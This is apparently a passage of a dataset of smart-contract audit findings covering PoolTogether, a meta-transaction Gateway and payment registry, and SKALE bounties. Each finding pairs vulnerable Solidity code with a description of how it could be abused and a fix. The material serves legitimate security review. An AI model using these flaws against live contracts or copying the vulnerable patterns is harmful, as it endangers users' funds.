externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n\\ntransferring the tokens\\n```\\n/// @notice Called by the prize strategy to award external ERC721 prizes\\n/// @dev Used to award any arbitrary NFTs held by the Prize Pool\\n/// @param to The address of the winner that receives the award\\n/// @param externalToken The address of the external NFT token being awarded\\n/// @param tokenIds An array of NFT Token IDs to be transferred\\nfunction awardExternalERC721(\\n address to,\\n address externalToken,\\n uint256[] calldata tokenIds\\n)\\n external override\\n onlyPrizeStrategy\\n{\\n require(\\_canAwardExternal(externalToken), ""PrizePool/invalid-external-token"");\\n\\n if (tokenIds.length == 0) {\\n return;\\n }\\n\\n for (uint256 i = 0; i < tokenIds.length; i++) {\\n IERC721(externalToken).transferFrom(address(this), to, tokenIds[i]);\\n }\\n\\n emit AwardedExternalERC721(to, externalToken, tokenIds);\\n}\\n```\\n",Ensure that no duplicate token-ids were provided or skip over token-ids that are not owned by prize-pool (anymore).,,"```\\n/// @notice Adds an external ERC721 token as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// NOTE: The NFT must already be owned by the Prize-Pool\\n/// @param \\_externalErc721 The address of an ERC721 token to be awarded\\n/// @param \\_tokenIds An array of token IDs of the ERC721 to be awarded\\nfunction addExternalErc721Award(address \\_externalErc721, uint256[] calldata \\_tokenIds) external onlyOwnerOrListener {\\n // require(\\_externalErc721.isContract(), 
""PeriodicPrizeStrategy/external-erc721-not-contract"");\\n require(prizePool.canAwardExternal(\\_externalErc721), ""PeriodicPrizeStrategy/cannot-award-external"");\\n \\n if (!externalErc721s.contains(\\_externalErc721)) {\\n externalErc721s.addAddress(\\_externalErc721);\\n }\\n\\n for (uint256 i = 0; i < \\_tokenIds.length; i++) {\\n uint256 tokenId = \\_tokenIds[i];\\n require(IERC721(\\_externalErc721).ownerOf(tokenId) == address(prizePool), ""PeriodicPrizeStrategy/unavailable-token"");\\n externalErc721TokenIds[\\_externalErc721].push(tokenId);\\n }\\n\\n emit ExternalErc721AwardAdded(\\_externalErc721, \\_tokenIds);\\n}\\n```\\n" +PeriodicPrizeStrategy - Token with callback related warnings (ERC777 a.o.),medium,"This issue is highly dependent on the configuration of the system. If an admin decides to allow callback enabled token (e.g. `ERC20` compliant `ERC777` or other ERC721/ERC20 extensions) as awards then one recipient may be able to\\nblock the payout for everyone by forcing a revert in the callback when accepting token awards\\nuse the callback to siphon gas, mint gas token, or similar activities\\npotentially re-enter the `PrizeStrategy` contract in an attempt to manipulate the payout (e.g. by immediately withdrawing from the pool to manipulate the 2nd ticket.draw())\\n```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n",It is highly recommended to not allow tokens with callback functionality into the system. 
Document and/or implement safeguards that disallow the use of callback enabled tokens. Consider implementing means for the “other winners” to withdraw their share of the rewards independently from others.,,"```\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n" +PeriodicPrizeStrategy - unbounded external tokens linked list may be used to force a gas DoS,medium,"The size of the linked list of ERC20/ERC721 token awards is not limited. This fact may be exploited by an administrative account by adding an excessive number of external token addresses.\\nThe winning user might want to claim their win by calling `completeAward()` which fails in one of the `_distribute() -> _awardAllExternalTokens() -> _awardExternalErc20s/_awardExternalErc721s` while loops if too many token addresses are configured and gas consumption hits the block gas limit (or it just gets too expensive for the user to call).\\nNote: an admin can recover from this situation by removing items from the list.\\n```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n 
require(prizePool.canAwardExternal(\\_externalErc20), ""PeriodicPrizeStrategy/cannot-award-external"");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n\\n```\\n/// @param newAddress The address to shift to the front of the list\\nfunction addAddress(Mapping storage self, address newAddress) internal {\\n require(newAddress != SENTINEL && newAddress != address(0), ""Invalid address"");\\n require(self.addressMap[newAddress] == address(0), ""Already added"");\\n self.addressMap[newAddress] = self.addressMap[SENTINEL];\\n self.addressMap[SENTINEL] = newAddress;\\n self.count = self.count + 1;\\n}\\n```\\n\\nawarding the tokens loops through the linked list of configured tokens\\n```\\n/// @notice Awards all external ERC721 tokens to the given user.\\n/// The external tokens must be held by the PrizePool contract.\\n/// @dev The list of ERC721s is reset after every award\\n/// @param winner The user to transfer the tokens to\\nfunction \\_awardExternalErc721s(address winner) internal {\\n address currentToken = externalErc721s.start();\\n while (currentToken != address(0) && currentToken != externalErc721s.end()) {\\n uint256 balance = IERC721(currentToken).balanceOf(address(prizePool));\\n if (balance > 0) {\\n prizePool.awardExternalERC721(winner, currentToken, externalErc721TokenIds[currentToken]);\\n delete externalErc721TokenIds[currentToken];\\n }\\n currentToken = externalErc721s.next(currentToken);\\n }\\n externalErc721s.clearAll();\\n}\\n```\\n",Limit the number of tokens an admin can add. 
Consider implementing an interface that allows the user to claim tokens one-by-one or in user-configured batches.,,"```\\n/// @notice Adds an external ERC20 token type as an additional prize that can be awarded\\n/// @dev Only the Prize-Strategy owner/creator can assign external tokens,\\n/// and they must be approved by the Prize-Pool\\n/// @param \\_externalErc20 The address of an ERC20 token to be awarded\\nfunction addExternalErc20Award(address \\_externalErc20) external onlyOwnerOrListener {\\n \\_addExternalErc20Award(\\_externalErc20);\\n}\\n\\nfunction \\_addExternalErc20Award(address \\_externalErc20) internal {\\n require(prizePool.canAwardExternal(\\_externalErc20), ""PeriodicPrizeStrategy/cannot-award-external"");\\n externalErc20s.addAddress(\\_externalErc20);\\n emit ExternalErc20AwardAdded(\\_externalErc20);\\n}\\n```\\n" +MultipleWinners - setNumberOfWinners does not enforce count>0,medium,"The constructor of `MultipleWinners` enforces that the argument `_numberOfWinners > 0` while `setNumberOfWinners` does not. A careless or malicious admin might set `__numberOfWinners` to zero to cause the `distribute()` method to throw and not pay out any winners.\\nenforced in the constructor\\n```\\nrequire(\\_numberOfWinners > 0, ""MultipleWinners/num-gt-zero"");\\n```\\n\\nnot enforced when updating the value at a later stage\\n```\\nfunction setNumberOfWinners(uint256 count) external onlyOwner {\\n \\_\\_numberOfWinners = count;\\n\\n emit NumberOfWinnersSet(count);\\n}\\n```\\n",Require that `numberOfWinners > 0`.,,"```\\nrequire(\\_numberOfWinners > 0, ""MultipleWinners/num-gt-zero"");\\n```\\n" +LootBox - plunder should disallow plundering to address(0),medium,"Anyone can call `LootboxController.plunder()` to plunder on behalf of a `tokenId` owner. 
If a `LootBox` received an AirDrop but no `NFT` was issued to an owner (yet) this might open up an opportunity for a malicious actor to call `plunder()` in an attempt to burn the ETH and any airdropped tokens that allow transfers to `address(0)`.\\nNote:\\nDepending on the token implementation, transfers may or may not revert if the `toAddress == address(0)`, while burning the `ETH` will succeed.\\nThis might allow anyone to forcefully burn received `ETH` that would otherwise be available to the future beneficiary\\nIf the airdrop and transfer of `LootBox` ownership are not done within one transaction, this might open up a front-running window that allows a third party to burn air-dropped `ETH` before it can be claimed by the `owner`.\\nconsider one component issues the airdrop in one transaction (or block) and setting the `owner` in a later transaction (or block). The `owner` is unset for a short duration of time which might allow anyone to burn `ETH` held by the `LootBox` proxy instance.\\n`plunder()` receiving the `owner` of an `ERC721.tokenId`\\n```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n\\nThe modified `ERC721` returns `address(0)` if the owner is not known\\n```\\n \\* @dev See {IERC721-ownerOf}.\\n \\*/\\nfunction ownerOf(uint256 tokenId) public view override returns (address) {\\n return \\_tokenOwners[tokenId];\\n}\\n```\\n\\nWhile `withdraw[ERC20|ERC721|ERC1155]` fail with `to == address(0)`, `transferEther()` succeeds and burns the eth by sending it to `address(0)`\\n```\\nfunction plunder(\\n IERC20[] memory erc20,\\n WithdrawERC721[] memory erc721,\\n WithdrawERC1155[] memory erc1155,\\n address payable to\\n) external {\\n \\_withdrawERC20(erc20, to);\\n \\_withdrawERC721(erc721, to);\\n \\_withdrawERC1155(erc1155, 
to);\\n transferEther(to, address(this).balance);\\n}\\n```\\n",Require that the destination address `to` in `plunder()` and `transferEther()` is not `address(0)`.,,"```\\nfunction plunder(\\n address erc721,\\n uint256 tokenId,\\n IERC20[] calldata erc20s,\\n LootBox.WithdrawERC721[] calldata erc721s,\\n LootBox.WithdrawERC1155[] calldata erc1155s\\n) external {\\n address payable owner = payable(IERC721(erc721).ownerOf(tokenId));\\n```\\n" +PeriodicPrizeStrategy - Inconsistent behavior between award-phase modifiers and view functions,low,"The logic in the `canStartAward()` function is inconsistent with that of the `requireCanStartAward` modifier, and the logic in the `canCompleteAward()` function is inconsistent with that of the `requireCanCompleteAward` modifier. Neither of these view functions appear to be used elsewhere in the codebase, but the similarities between the function names and the corresponding modifiers is highly misleading.\\n`canStartAward()` is inconsistent with `requireCanStartAward`\\n```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n\\n```\\nmodifier requireCanStartAward() {\\n require(\\_isPrizePeriodOver(), ""PeriodicPrizeStrategy/prize-period-not-over"");\\n require(!isRngRequested() || isRngTimedOut(), ""PeriodicPrizeStrategy/rng-already-requested"");\\n \\_;\\n}\\n```\\n\\n`canCompleteAward()` is inconsistent with `requireCanCompleteAward`\\n```\\nfunction canCompleteAward() external view returns (bool) {\\n return isRngRequested() && isRngCompleted();\\n}\\n```\\n\\n```\\nmodifier requireCanCompleteAward() {\\n require(\\_isPrizePeriodOver(), ""PeriodicPrizeStrategy/prize-period-not-over"");\\n require(isRngRequested(), ""PeriodicPrizeStrategy/rng-not-requested"");\\n require(isRngCompleted(), ""PeriodicPrizeStrategy/rng-not-complete"");\\n \\_;\\n}\\n```\\n",Make the logic consistent between the view functions and the modifiers of the same name or remove the 
functions.,,```\\nfunction canStartAward() external view returns (bool) {\\n return \\_isPrizePeriodOver() && !isRngRequested();\\n}\\n```\\n +MultipleWinners - Awards can be guaranteed with a set number of tickets,low,"Because additional award drawings are distributed at a constant interval in the `SortitionSumTree` by `MultipleWinners._distribute()`, any user that holds a number of tickets `>= floor(totalSupply / __numberOfWinners)` can guarantee at least one award regardless of the initial drawing.\\nMultipleWinners._distribute():\\n```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n","Do not distribute awards at fixed intervals from the initial drawing, but instead randomize the additional drawings as well.",,```\\nuint256 ticketSplit = totalSupply.div(\\_\\_numberOfWinners);\\nuint256 nextRandom = randomNumber.add(ticketSplit);\\n// the other winners receive their prizeShares\\nfor (uint256 winnerCount = 1; winnerCount < \\_\\_numberOfWinners; winnerCount++) {\\n winners[winnerCount] = ticket.draw(nextRandom);\\n nextRandom = nextRandom.add(ticketSplit);\\n}\\n```\\n +MultipleWinners - Inconsistent behavior compared to SingleRandomWinner,low,"The `MultipleWinners` strategy carries out award distribution to the zero address if `ticket.draw()` returns `address(0)` (indicating an error condition) while `SingleRandomWinner` does not.\\n`SingleRandomWinner` silently skips award distribution if `ticket.draw()` returns `address(0)`.\\n```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = 
ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n\\n`MultipleWinners` still attempts to distribute awards if `ticket.draw()` returns `address(0)`. This may or may not succeed depending on the implementation of the tokens included in the `externalErc20s` and `externalErc721s` linked lists.\\n```\\nfunction \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n\\n // main winner gets all external tokens\\n address mainWinner = ticket.draw(randomNumber);\\n \\_awardAllExternalTokens(mainWinner);\\n\\n address[] memory winners = new address[](\\_\\_numberOfWinners);\\n winners[0] = mainWinner;\\n```\\n",Implement consistent behavior. Avoid hiding error conditions and consider throwing an exception instead.,,"```\\ncontract SingleRandomWinner is PeriodicPrizeStrategy {\\n function \\_distribute(uint256 randomNumber) internal override {\\n uint256 prize = prizePool.captureAwardBalance();\\n address winner = ticket.draw(randomNumber);\\n if (winner != address(0)) {\\n \\_awardTickets(winner, prize);\\n \\_awardAllExternalTokens(winner);\\n }\\n }\\n}\\n```\\n" +Initialize implementations for proxy contracts and protect initialization methods,low,"Any situation where the implementation of proxy contracts can be initialized by third parties should be avoided. This can be the case if the `initialize` function is unprotected or not initialized immediately after deployment. Since the implementation contract is not meant to be used directly without a proxy delegate-calling to it, it is recommended to protect the initialization method of the implementation by initializing on deployment.\\nThis affects all proxy implementations (the delegatecall target contract) deployed in the system.\\nThe implementation for `MultipleWinners` is not initialized. 
Even though not directly used by the system it may be initialized by a third party.\\n```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n\\nThe deployed `ERC721Contract` is not initialized.\\n```\\nconstructor () public {\\n erc721ControlledInstance = new ERC721Controlled();\\n erc721ControlledBytecode = MinimalProxyLibrary.minimalProxy(address(erc721ControlledInstance));\\n}\\n```\\n\\nThe deployed `LootBox` is not initialized.\\n```\\nconstructor () public {\\n lootBoxActionInstance = new LootBox();\\n lootBoxActionBytecode = MinimalProxyLibrary.minimalProxy(address(lootBoxActionInstance));\\n}\\n```\\n",Initialize unprotected implementation contracts in the implementation's constructor. Protect initialization methods from being called by unauthorized parties or ensure that deployment of the proxy and initialization is performed in the same transaction.,,```\\nconstructor () public {\\n instance = new MultipleWinners();\\n}\\n```\\n +LootBox - transferEther should be internal,low,"`LootBox.transferEther()` can be `internal` as it is only called from `LootBox.plunder()` and the LootBox(proxy) instances are generally very short-living (created and destroyed within one transaction).\\n```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n",Restrict transferEther()'s visibility to `internal`.,,"```\\nfunction transferEther(address payable to, uint256 amount) public {\\n to.transfer(amount);\\n\\n emit TransferredEther(to, amount);\\n}\\n```\\n" +LootBox - executeCalls can be misused to relay calls,low,"`LootBox` is deployed with `LootBoxController` and serves as the implementation for individual `create2` lootbox proxy contracts. None of the methods of the `LootBox` implementation contract are access restricted. 
A malicious actor may therefore use the `executeCalls()` method to relay arbitrary calls to other contracts on the blockchain in an attempt to disguise the origin or misuse the reputation of the `LootBox` contract (as it belongs to the PoolTogether project).\\nNote: allows non-value and value calls (deposits can be forces via selfdestruct)\\n```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n",Restrict access to call forwarding functionality to trusted entities. Consider implementing the `Ownable` pattern allowing access to functionality to the owner only.,,"```\\nfunction executeCalls(Call[] calldata calls) external returns (bytes[] memory) {\\n bytes[] memory response = new bytes[](calls.length);\\n for (uint256 i = 0; i < calls.length; i++) {\\n response[i] = \\_executeCall(calls[i].to, calls[i].value, calls[i].data);\\n }\\n return response;\\n}\\n```\\n" +ERC20 tokens with no return value will fail to transfer,high,"Although the ERC20 standard suggests that a transfer should return `true` on success, many tokens are non-compliant in this regard.\\nIn that case, the `.transfer()` call here will revert even if the transfer is successful, because solidity will check that the RETURNDATASIZE matches the ERC20 interface.\\n```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n",Consider using OpenZeppelin's SafeERC20.,,"```\\nif (!instance.transfer(getSendAddress(), forwarderBalance)) {\\n revert('Could not gather ERC20');\\n}\\n```\\n" +Delegated transactions can be executed for multiple accounts,high,"The `Gateway` contract allows users to create meta transactions triggered by the system's backend. 
To do so, one of the owners of the account should sign the message in the following format:\\n```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n\\nThe message includes a nonce, destination address, and call data. The problem is that this message does not include the `account` address. So if the `sender` is the owner of multiple accounts, this meta transaction can be called for multiple accounts.",Resolution\\nComment from the client: The issue has been solved\\nAdd the `account` field in the signed message or make sure that any address can be the owner of only one `account`.,,"```\\naddress sender = \\_hashPrimaryTypedData(\\n \\_hashTypedData(\\n nonce,\\n to,\\n data\\n )\\n).recoverAddress(senderSignature);\\n```\\n" +Removing an owner does not work in PersonalAccountRegistry,high,"An owner of a personal account can be added/removed by other owners. When removing the owner, only `removedAtBlockNumber` value is updated. 
`accounts[account].owners[owner].added` remains true:\\n```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n\\nBut when the account is checked whether this account is the owner, only `accounts[account].owners[owner].added` is actually checked:\\n```\\nfunction \\_verifySender(\\n address account\\n)\\n private\\n returns (address)\\n{\\n address sender = \\_getContextSender();\\n\\n if (!accounts[account].owners[sender].added) {\\n require(\\n accounts[account].salt == 0\\n );\\n\\n bytes32 salt = keccak256(\\n abi.encodePacked(sender)\\n );\\n\\n require(\\n account == \\_computeAccountAddress(salt)\\n );\\n\\n accounts[account].salt = salt;\\n accounts[account].owners[sender].added = true;\\n\\n emit AccountOwnerAdded(\\n account,\\n sender\\n );\\n }\\n\\n return sender;\\n}\\n```\\n\\nSo the owner will never be removed, because `accounts[account].owners[owner].added` will always be `true.",Properly check if the account is still the owner in the `_verifySender` function.,,"```\\naccounts[account].owners[owner].removedAtBlockNumber = block.number;\\n\\nemit AccountOwnerRemoved(\\n account,\\n owner\\n);\\n```\\n" +The withdrawal mechanism is overcomplicated,medium,"To withdraw the funds, anyone who has the account in `PaymentRegistry` should call the `withdrawDeposit` function and go through the withdrawal process. 
After the lockdown period (30 days), the user will withdraw all the funds from the account.\\n```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n\\nDuring that period, everyone who has a channel with the user is forced to commit their channels or lose money from that channel. When doing so, every user will reset the initial lockdown period and the withdrawer should start the process again.\\n```\\nif (deposits[sender].withdrawalLockedUntil[token] > 0) {\\n deposits[sender].withdrawalLockedUntil[token] = 0;\\n```\\n\\nThere is no way for the withdrawer to close the channel by himself. If the withdrawer has N channels, it's theoretically possible to wait for up to N*(30 days) period and make N+2 transactions.","There may be some minor recommendations on how to improve that without major changes:\\nWhen committing a payment channel, do not reset the lockdown period to zero. 
Two better options would be either not changing it at all or extending it to `now + depositWithdrawalLockPeriod`",,"```\\nfunction withdrawDeposit(\\n address token\\n)\\n external\\n{\\n address owner = \\_getContextAccount();\\n uint256 lockedUntil = deposits[owner].withdrawalLockedUntil[token];\\n\\n /\\* solhint-disable not-rely-on-time \\*/\\n\\n if (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n } else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n\\n deposits[owner].withdrawalLockedUntil[token] = lockedUntil;\\n\\n emit DepositWithdrawalRequested(\\n deposits[owner].account,\\n owner,\\n token,\\n lockedUntil\\n );\\n }\\n /\\* solhint-enable not-rely-on-time \\*/\\n}\\n```\\n"
+The lockdown period shouldn't be extended when called multiple times,low,"In order to withdraw a deposit from the `PaymentRegistry`, the account owner should call the `withdrawDeposit` function and wait for `depositWithdrawalLockPeriod` (30 days) before actually transferring all the tokens from the account.\\nThe issue is that if the withdrawer accidentally calls it for the second time before these 30 days pass, the waiting period gets extended for 30 days again.\\n```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = 
ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n",Resolution\\nComment from the client: The issue has been solved\\nOnly extend the waiting period when a withdrawal is requested for the first time.,,"```\\nif (lockedUntil != 0 && lockedUntil <= now) {\\n deposits[owner].withdrawalLockedUntil[token] = 0;\\n\\n address depositAccount = deposits[owner].account;\\n uint256 depositValue;\\n\\n if (token == address(0)) {\\n depositValue = depositAccount.balance;\\n } else {\\n depositValue = ERC20Token(token).balanceOf(depositAccount);\\n }\\n\\n \\_transferFromDeposit(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n\\n emit DepositWithdrawn(\\n depositAccount,\\n owner,\\n token,\\n depositValue\\n );\\n} else {\\n \\_deployDepositAccount(owner);\\n\\n lockedUntil = now.add(depositWithdrawalLockPeriod);\\n```\\n" +Gateway can call any contract Acknowledged,low,"Resolution\\nComment from the client: That's right Gateway can call any contract, we want to keep it open for any external contract.\\nThe `Gateway` contract is used as a gateway for meta transactions and batched transactions. 
It can currently call any contract, while it is only intended to call specific contracts in the system that implemented `GatewayRecipient` interface:\\n```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n\\nThere are currently no restrictions for `to` value.","Make sure only intended contracts can be called by the `Gateway` : `PersonalAccountRegistry`, `PaymentRegistry`, `ENSController`.",,"```\\n for (uint256 i = 0; i < data.length; i++) {\\n require(\\n to[i] != address(0)\\n );\\n\\n // solhint-disable-next-line avoid-low-level-calls\\n (succeeded,) = to[i].call(abi.encodePacked(data[i], account, sender));\\n\\n require(\\n succeeded\\n );\\n }\\n}\\n```\\n"
+Remove unused code,low,"```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n","It is recommended to remove this value as there are no use cases for it at the moment, however if it is planned to be used in the future, it should be well documented in the code to prevent confusion.",,"```\\n return \\_deployAccount(\\n salt,\\n 0\\n );\\n}\\n\\nfunction \\_deployAccount(\\n bytes32 salt,\\n uint256 value\\n)\\n internal\\n returns (address)\\n{\\n return address(new Account{salt: salt, value: value}());\\n}\\n```\\n"
+Every node gets a full validator's bounty,high,"Resolution\\nThis issue is addressed in Bug/skale 3273 formula fix 435 and SKALE-3273 Fix BountyV2 populating error 438.\\nThe main change is related to how bounties are calculated for each validator. 
Below are a few notes on these pull requests:\\n`nodesByValidator` mapping is no longer used in the codebase and the non-zero values are deleted when `calculateBounty()` is called for a specific validator. The mapping is kept in the code for compatible storage layout in upgradable proxies.\\nSome functions such as `populate()` was developed for the transition to the upgraded contracts (rewrite `_effectiveDelegatedSum` values based on the new calculation formula). This function is not part of this review and will be removed in the future updates.\\nUnlike the old architecture, `nodesByValidator[validatorId]` is no longer used within the system to calculate `_effectiveDelegatedSum` and bounties. This is replaced by using overall staked amount and duration.\\nIf a validator does not claim their bounty during a month, it is considered as a misbehave and her bounty goes to the bounty pool for the next month.\\nTo get the bounty, every node calls the `getBounty` function of the `SkaleManager` contract. This function can be called once per month. The size of the bounty is defined in the `BountyV2` contract in the `_calculateMaximumBountyAmount` function:\\n```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n\\nThe problem is that this amount actually represents the amount that should be paid to the validator of that node. But each node will get this amount. 
Additionally, the amount of validator's bounty should also correspond to the number of active nodes, while this formula only uses the amount of delegated funds.",Every node should get only their parts of the bounty.,,"```\\nreturn epochPoolSize\\n .add(\\_bountyWasPaidInCurrentEpoch)\\n .mul(\\n delegationController.getAndUpdateEffectiveDelegatedToValidator(\\n nodes.getValidatorId(nodeIndex),\\n currentMonth\\n )\\n )\\n .div(effectiveDelegatedSum);\\n```\\n" +A node exit prevents some other nodes from exiting for some period Pending,medium,"When a node wants to exit, the `nodeExit` function should be called as many times, as there are schains in the node. Each time one schain is getting removed from the node. During every call, all the active schains are getting frozen for 12 hours.\\n```\\nfunction freezeSchains(uint nodeIndex) external allow(""SkaleManager"") {\\n SchainsInternal schainsInternal = SchainsInternal(contractManager.getContract(""SchainsInternal""));\\n bytes32[] memory schains = schainsInternal.getActiveSchains(nodeIndex);\\n for (uint i = 0; i < schains.length; i++) {\\n Rotation memory rotation = rotations[schains[i]];\\n if (rotation.nodeIndex == nodeIndex && now < rotation.freezeUntil) {\\n continue;\\n }\\n string memory schainName = schainsInternal.getSchainName(schains[i]);\\n string memory revertMessage = ""Node cannot rotate on Schain "";\\n revertMessage = revertMessage.strConcat(schainName);\\n revertMessage = revertMessage.strConcat("", occupied by Node "");\\n revertMessage = revertMessage.strConcat(rotation.nodeIndex.uint2str());\\n string memory dkgRevert = ""DKG process did not finish on schain "";\\n ISkaleDKG skaleDKG = ISkaleDKG(contractManager.getContract(""SkaleDKG""));\\n require(\\n skaleDKG.isLastDKGSuccessful(keccak256(abi.encodePacked(schainName))),\\n dkgRevert.strConcat(schainName));\\n require(rotation.freezeUntil < now, revertMessage);\\n \\_startRotation(schains[i], nodeIndex);\\n }\\n}\\n```\\n\\nBecause of that, no 
